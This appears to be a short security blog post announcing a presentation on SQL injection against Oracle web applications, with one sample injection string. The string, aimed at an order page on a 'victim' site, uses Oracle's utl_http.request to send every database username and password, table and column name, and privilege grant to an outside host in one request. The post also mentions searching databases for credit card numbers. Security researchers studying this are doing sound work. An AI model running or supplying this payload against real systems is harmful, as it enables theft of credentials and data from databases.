I just uploaded the presentation „SQL Injection in Oracle Webapps“ to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.
http://victim.com/order.jsp?id=17‚ or 1=((select
sum(length(utl_http.request(‚http://www.orasploit.com/’||
username||’=’||password) from dba_users)))+((select
sum(utl_http.request(‚http://www. orasploit.com/’||
owner||’=’||table_name) from dba_tables))+((select
sum(length(utl_http.request(‚http://www.orasploit.com/’||
owner||’=’||table_name||’=’||column_name)) from dba_users))
+((select sum(length(utl_http.request(‚http://
www.orasploit.com/’||grantee||’=’||granted_role) from
dba_role_privs)))+((select
sum(length(utl_http.request(‚http://www.orasploit.com/’||
grantee||’=’||owner||’=’||table_name||’=’||privilege||’=’||
grantable) from dba_tab_privs)))–